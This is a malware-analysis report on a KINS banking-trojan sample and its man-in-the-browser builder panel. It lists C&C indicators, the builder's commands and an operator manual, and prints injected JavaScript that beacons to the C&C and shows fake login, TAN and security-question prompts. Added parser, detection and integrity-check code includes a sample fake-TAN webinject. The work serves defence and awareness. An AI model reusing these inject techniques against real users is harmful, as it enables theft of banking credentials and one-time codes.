Revealing Unique MitB Builder C&C Server
Short Technical Analysis for Intelligence and Awareness
Senad Aruc & Davide Cioccia
March 2015
References
(1) https://www.linkedin.com/pulse/20141117183957-26232854-kins-origin-malware-with-unique-atsengine-cc-server?trk=prof-post
(2) http://en.wikipedia.org/wiki/Man-in-the-browser
INTRODUCTION
In the past we have analysed most of the well-known banking malware families and their C&C servers. We saw a "KINS" sample with a unique "ATS" engine that drove the victim's electronic banking web application on auto-pilot (1). It is easy to go underground and buy a malware kit with MitB (2) add-ons for well-known electronic banking web applications, or to order a custom one. These injectors are the main weapon criminals use against electronic banking applications where two-factor authentication with "tokens" is implemented.
Man in the Browser Attack (2)
Bypassing 2-factor authentication (3)
ATTACK
We were given exclusive rights to analyse this malware sample, which targets a large financial institution located in the EU. It is a targeted attack with three main components.
• Malware "KINS"
o Version: 2.0
o First seen: 14.02.2015
o MD5: babc53295da4cd953a1cae1e33de4910
• C&C "Zeus"
o Configuration: hxxx://hidden.ru:80/1/uggi/binari/hy78.jpg → Config
o Drop-Zone: hxxx://hidden.ru:80/1/uggi/gate.php → Gate
o Binary: hxxx://hidden.ru:80/1/uggi/binari/bot.exe → Malware
• MitB C&C "Blocks"
o Base64 encoded: aHR0cHM6Ly9hiddencnkuY29tLhiddenaHA=
o Base64 decoded: hxxs://hidden.com:443/s/g.php → Gate
o hxxx://hidden.com:443/s/manual.php → Russian manual for Blocks
o hxxx://hidden.com:443/s/center.php → C&C server for the Blocks MitB
INSIDE MITB C&C BLOCKS
This MitB builder is designed to let even an inexperienced attacker assemble a MitB attack simply by adding and configuring "blocks" for every function and step.
With this method the attacker can react to the victim's actions invisibly, pushing injected commands into the browser and hiding them by manipulating the page's CSS, HTML and JavaScript.

C&C Blocks MitB Server Login Page
The edit function in the first section builds a MitB for the victims of a specific bank group. Here we can see the blocks used to assemble the MitB attack.

MitB Group Builder

The command available for every block is described in this drop-down list:
• Go – lets the victim reach the real e-banking web application
• Question – builds a custom questionnaire for the victim
• Error Question – asks a question and displays an error message
• Tan – JavaScript function that shows the TAN prompt
• Error Tan – JavaScript function, the error variant of Tan
• Hold – invoked when the victim clicks the button to submit a transaction
• Error Login – tricks the victim into believing the login details are wrong
• Kick – kicks the victim out of the e-banking application
• Confirm – builds fake confirmation messages
• Page – forwards the victim to a different page
Drop-Down List Commands

Another function of this MitB builder is a custom injection for every single victim bot. Here we can see the inject functions the attacker can build for a specific victim bot. The username and the OTP for every command can be seen in the information marked with the red box.
The attacker can configure the following inject fields:
• Button Text
• Command
• Parameter 1
• Parameter 3
• Style
The only manual we managed to discover is a short description of this MitB.
English translation:
Manual for this MitB builder
Guide
1. Statistics:
Each bank is assigned an initial value for whether to skip authentication at login.
hold - delay the user for param1 seconds; param2 and param3 are not taken into account
- if the admin operator is not online, the user is let through.
go - let the user through; parameters are not taken into account
2. Last results:
For a multi-query:
info_send_1 - the requested information was sent
info_send_2 - information from the second page was sent
For a single query:
info_send - info sent
INJECTIONS
During our analysis we recovered the configuration file used by the KINS malware to steal sensitive information from end users. The injected script follows the default layout of a financial malware webinject, with the following fields:
• Entry: type of injection performed by the malware
• Target: the real target, an online banking portal
• Flags: HTTP methods the malware must intercept in order to change the HTML code inside the HTTP response. We found two flags in the configuration file:
o P - intercept an HTTP POST request
o G - intercept an HTTP GET request
• data_before_inject: the point in the page after which the webinject is inserted
• data_end: the end marker of the injection
• data_inject: the actual JavaScript injection
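To make those fields concrete, here is an added example (not code from the report or from the KINS sample) that parses entries in the Zeus-family webinjects.txt layout, which KINS, a Zeus derivative, uses: `set_url <url mask> <flags>` followed by `data_before`, `data_inject` and `data_after` blocks, each closed by `data_end`. The report does not show the raw file, so the layout, the sample configuration, the host names and the `*`-only mask handling are assumptions of this example; `matchingInjects` applies the G/P flag semantics listed above to a captured request.

```javascript
// Parser for Zeus/KINS-style "webinjects.txt" entries (added example, not
// code from the analysed sample). Assumed layout: "set_url <mask> <flags>",
// then data_before / data_inject / data_after blocks, each ended by data_end.

// Constructed sample configuration: two injects against a fictitious bank.
const SAMPLE_WEBINJECTS = `
set_url https://ebanking.example-bank.test/login* GP
data_before
<body*>
data_end
data_inject
<script>jQuery('body').hide();</script>
data_end
data_after
data_end

set_url *example-bank.test/transfer/confirm* P
data_before
<form*name="tan"*>
data_end
data_inject
<div id="fake-tan">Enter TAN:<input name="u_tan"></div>
data_end
data_after
data_end
`;

// Section keywords that open a payload block terminated by data_end.
const SECTIONS = new Set(['data_before', 'data_inject', 'data_after']);

// Parse the text into entries: { target, flags, data_before, data_inject, data_after }.
function parseWebinjects(text) {
  const entries = [];
  let current = null;   // entry being filled
  let section = null;   // payload block currently open, if any
  for (const rawLine of text.split(/\r?\n/)) {
    const line = rawLine.trim();
    if (section) {
      // Inside a payload block: keep lines verbatim until data_end.
      if (line === 'data_end') section = null;
      else current[section].push(rawLine);
      continue;
    }
    if (line === '') continue;
    if (line.startsWith('set_url ')) {
      // "set_url <mask> <flags>"; flags may be absent in real files.
      const parts = line.split(/\s+/);
      current = { target: parts[1], flags: parts[2] || '',
                  data_before: [], data_inject: [], data_after: [] };
      entries.push(current);
    } else if (SECTIONS.has(line) && current) {
      section = line;
    }
  }
  return entries.map(e => ({
    target: e.target, flags: e.flags,
    data_before: e.data_before.join('\n'),
    data_inject: e.data_inject.join('\n'),
    data_after: e.data_after.join('\n'),
  }));
}

// Turn a url mask into a RegExp. Only '*' (any run of characters) is handled;
// the mask is matched case-insensitively against the full URL.
function maskToRegExp(mask) {
  const escaped = mask.split('*')
    .map(s => s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'))
    .join('.*');
  return new RegExp('^' + escaped + '$', 'i');
}

// Return the entries that would fire for a request: flag G covers GET and
// flag P covers POST, as described in the report. Entries without a matching
// flag never fire (assumption for entries that carry no flags at all).
function matchingInjects(entries, method, url) {
  const flag = method.toUpperCase() === 'POST' ? 'P' : 'G';
  return entries.filter(e => e.flags.toUpperCase().includes(flag) &&
                             maskToRegExp(e.target).test(url));
}

// Stand-alone demo: list targets and which fire for a login page load.
const demoEntries = parseWebinjects(SAMPLE_WEBINJECTS);
for (const e of demoEntries) console.log(e.flags.padEnd(3), e.target);
console.log('fires on GET /login:',
  matchingInjects(demoEntries, 'GET', 'https://ebanking.example-bank.test/login').length);
```

Running the parser over a recovered configuration gives the analyst the full list of targeted URL masks and the exact payload per target, which is what the "Target" and "data_inject" fields above describe; the matcher answers the operational question of whether a given captured request would have been modified.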
As the configuration file shows, the first operation made by the malware is to hide the whole HTML body:
jQuery('body').hide();
After that the user is blocked for a short period, until the malware receives instructions from the C&C server. In the following snippet we can see the command exchange between client and server:
// Poll the C&C gate for the next command to apply to this victim.
// bot_id, sa, sendScriptRequest, logMessages, checkInterval and do2 are
// defined elsewhere in the injected script; do2 holds the parsed C&C reply,
// with the command in do2[0] and its arguments in do2[1] and do2[2].
function checkReturnCommand()
{
    var req = "send=2&u_bot_id=" + bot_id + "&bn=euHypo&u_login=&u_pass=&log=cbf_check_command";

    function check_command()
    {
        if (do2[0] == 'go')
        {
            // Let the victim proceed to the real e-banking page.
            logMessages('let user go', 'go', '', '');
        }
        else if (do2[0] == 'errorlogin')
        {
            // Show a fake "wrong login" or TAN prompt and stop polling.
            logMessages('Show Error Login or Tan Message to Holder', do2[0], do2[1], do2[2]);
            clearInterval(checkInterval);
        }
        else if (do2[0] == 'question')
        {
            // Show a fake secret-question dialog and stop polling.
            logMessages('Show Question[' + do2[1] + ']', do2[0], do2[1], do2[2]);
            clearInterval(checkInterval);
        }
    }

    sendScriptRequest(sa, req, check_command, ["test123"]);
}
This function is a callback that polls the server for the victim's status. If the C&C answers with a 'go' command, the inject stops interfering and the user can navigate to the next page of the website. The 'errorlogin' command shows a fake error or a TAN request in the user's browser to steal the dynamic part of the credentials. The 'question' command displays a secret question-and-answer panel to steal the information needed to recover a lost password.
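As an added example (not part of the report), the following detection logic, written for a proxy or sensor log, keys on the parameter set of the check-in request shown above (`send`, `u_bot_id`, `bn`, `u_login`, `u_pass`, `log`) rather than on the C&C host names, which the report redacts and which change between campaigns. The request records, host names and bot id are constructed; the weak path indicator uses only the `gate.php`, `g.php` and `center.php` names from the ATTACK section.

```javascript
// Detection of the Blocks/KINS check-in beacon ("log=cbf_check_command")
// seen in the injected script. Added example, not code from the report.
// Requests are matched on the POST body's parameter set, not on host names.

// The six parameters the bot sends on every check-in (from the snippet above).
const REQUIRED_PARAMS = ['send', 'u_bot_id', 'bn', 'u_login', 'u_pass', 'log'];

// Gate script names seen in the report; a weak indicator on its own.
const GATE_PATHS = /\/(gate|g|center)\.php$/i;

// Constructed sample of proxy-logged requests: { method, url, body }.
const SAMPLE_REQUESTS = [
  // Initial check-in, credentials not yet harvested.
  { method: 'POST', url: 'https://hidden.example/s/g.php',
    body: 'send=2&u_bot_id=8f3a1c&bn=euHypo&u_login=&u_pass=&log=cbf_check_command' },
  // Same beacon after the fake login panel captured credentials (constructed values).
  { method: 'POST', url: 'https://hidden.example/s/g.php',
    body: 'send=2&u_bot_id=8f3a1c&bn=euHypo&u_login=jdoe&u_pass=s3cret&log=cbf_check_command' },
  // Legitimate login post to the bank itself.
  { method: 'POST', url: 'https://ebanking.example-bank.test/login',
    body: 'username=jdoe&password=s3cret' },
  // Unrelated file that merely shares a gate-like name.
  { method: 'GET', url: 'https://cdn.example/g.php?v=1', body: '' },
];

// Classify one request. Returns a verdict plus the fields an analyst wants
// for triage (bot id, bank tag, whether credentials were in the beacon).
function inspectRequest(req) {
  const params = new URLSearchParams(req.body || '');
  const present = REQUIRED_PARAMS.filter(p => params.has(p));
  const gateLike = GATE_PATHS.test(new URL(req.url).pathname);

  if (present.length === REQUIRED_PARAMS.length) {
    // Strong match: the full check-in parameter set is present.
    return {
      verdict: 'mitb-checkin',
      botId: params.get('u_bot_id'),
      bankTag: params.get('bn'),
      stage: params.get('log'),
      credentialsLeaked: params.get('u_login') !== '' || params.get('u_pass') !== '',
      gateLike,
    };
  }
  // Weak: only the path looks like a gate; low-severity alert, not a block.
  return { verdict: gateLike ? 'suspicious-path' : 'clean', gateLike };
}

// Run the classifier over a batch of logged requests.
function scan(requests) {
  return requests.map(r => ({ url: r.url, ...inspectRequest(r) }));
}

// Stand-alone demo.
for (const r of scan(SAMPLE_REQUESTS)) console.log(r.verdict.padEnd(16), r.url);
```

A `credentialsLeaked` hit is the one to escalate: it means the fake panel already captured a login, and the affected `botId` / `bankTag` pair identifies which customer session of which bank group the operator is working on.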
Another function handles a different set of commands:
// Second polling callback; ret_val and sTimer are set elsewhere in the script.
function statusCall()
{
    if (ret_val == '0')
    {
        if ((do2[0] == 'go') || (do2[0] == 'go_inactive'))
        {
            logMessages('let user go', 'go', '', '');
        }
        else if ((do2[0] == 'hold') || (do2[0] == 'tan'))
        {
            // Keep the victim waiting behind a spinner ("throbber") for sTimer seconds.
            logMessages('Hold after login,show first throbber for ' + sTimer + ' Sec', 'throb', '', '');
            return false;
        }
    }
    else if (ret_val == 'block')
    {
        // Show a fake "blocked" page.
        logMessages('Show block fake', 'block', '', '');
        return false;
    }
}

sendScriptRequest(sa, req, statusCall, ["test123"]);
Here the 'hold', 'tan' and 'block' commands respectively hold the victim on the page, show the TAN authentication panel, and block the user with a fake message.
CONCLUSION
A conventional antivirus cannot reliably detect this kind of advanced malware. Once the malware infects a machine, it can change its behaviour and code continuously to evade signature-based detection. This new MitB builder is also changing the way MitB injectors are built and sold on black markets: with it, anyone can build their own MitB inject and target different banks in no time. A new injection, or a complete malware package, can be bought on dark-web forums and markets for a few Bitcoins or a few hundred dollars. A complete solution provides the C&C panel (drop zone), the malware, the injection, a spam campaign and, if needed, a malicious mobile application to steal sensitive data such as OTPs.
To protect end users from this risk, financial institutions have to adopt solutions that detect anomalous behaviour in the web page and in the user experience. The ability to make custom web injects for every single action makes this attack different for each bank. Signature-based detection can be evaded by obfuscating the code with different techniques, but there are solutions that raise an alert when the integrity of the web page is compromised. So-called Active Fraud Prevention solutions can analyse the HTML resources dynamically and fingerprint users to detect connections in a short time from different countries ("session stealing").
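As an added example of the page-integrity check the conclusion calls for (not code from the report or from any product), the following snapshot-and-compare logic flags the three observable effects described in this report: a hidden `body`, extra input fields such as a TAN or secret-question prompt, and scripts loaded from an origin other than the bank's. The baseline, the snapshots, the field and origin names are constructed; `collectFormState` shows how a browser would take the snapshot and is not executed here.

```javascript
// Client-side integrity snapshot of a login page, compared against a baseline
// the bank controls. Added example, not code from the report or any product.

// Constructed baseline: the bank's own login form and script origin.
const BASELINE = {
  fields: ['username', 'password', 'csrf_token'],
  scriptOrigins: ['https://ebanking.example-bank.test'],
};

// Constructed snapshot of an untouched page.
const CLEAN_STATE = {
  bodyHidden: false,
  fields: ['username', 'password', 'csrf_token'],
  scriptOrigins: ['https://ebanking.example-bank.test'],
};

// Constructed snapshot after a MitB inject: body hidden (jQuery('body').hide()),
// fake TAN and secret-question inputs added, script pulled from a foreign origin.
const INJECTED_STATE = {
  bodyHidden: true,
  fields: ['username', 'password', 'csrf_token', 'u_tan', 'u_question'],
  scriptOrigins: ['https://ebanking.example-bank.test', 'https://hidden.example'],
};

// Browser-side collector (uses DOM APIs; not executed under Node).
function collectFormState(form) {
  const style = getComputedStyle(document.body);
  return {
    bodyHidden: style.display === 'none' || style.visibility === 'hidden',
    fields: Array.from(form.querySelectorAll('input,select,textarea'))
      .map(el => el.name).filter(Boolean),
    scriptOrigins: Array.from(document.scripts)
      .map(s => s.src && new URL(s.src, location.href).origin).filter(Boolean),
  };
}

// Compare a snapshot with the baseline and return human-readable findings.
// An empty array means the page looks as the bank shipped it.
function checkIntegrity(state, baseline = BASELINE) {
  const findings = [];
  if (state.bodyHidden) {
    findings.push('body hidden (matches the jQuery("body").hide() pre-step)');
  }
  const extra = state.fields.filter(f => !baseline.fields.includes(f));
  if (extra.length) findings.push('unexpected fields: ' + extra.join(', '));
  const missing = baseline.fields.filter(f => !state.fields.includes(f));
  if (missing.length) findings.push('missing fields: ' + missing.join(', '));
  const foreign = state.scriptOrigins.filter(o => !baseline.scriptOrigins.includes(o));
  if (foreign.length) findings.push('foreign script origins: ' + foreign.join(', '));
  return findings;
}

// Stand-alone demo.
console.log('clean   :', checkIntegrity(CLEAN_STATE));
console.log('injected:', checkIntegrity(INJECTED_STATE));
```

Because a MitB runs inside the victim's browser, the verdict must not be computed and trusted client-side: the page should post the raw snapshot to the bank's server, where the comparison runs against the baseline for that page version, and a missing, malformed or delayed snapshot is itself a finding, since the inject may simply suppress the reporting code.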
ABOUT
Senad Aruch
Multiple Certified ISMS Professional with a 10-year background in IT Security, IDS and IPS, SIEM, SOC, Network Forensics, Malware Analysis, ISMS and Risk, Ethical Hacking, Vulnerability Management, Anti-Fraud and Cyber Security. Currently holding a Senior Lead position.
E-Mail: senad.aruc@gmail.com
Blog: www.senadaruc.com
Twitter: senadaruch
LinkedIn: linkedin.com/in/senadaruc

Davide Cioccia
MSc Computer Engineering degree. Security Developer focused on Cyber Security Intelligence, Malware Analysis and Anti-Fraud systems. Microsoft certified. Currently holding a Security Consultant position.
E-Mail: davide.cioccia@live.it
Twitter: david107
LinkedIn: linkedin.com/in/davidecioccia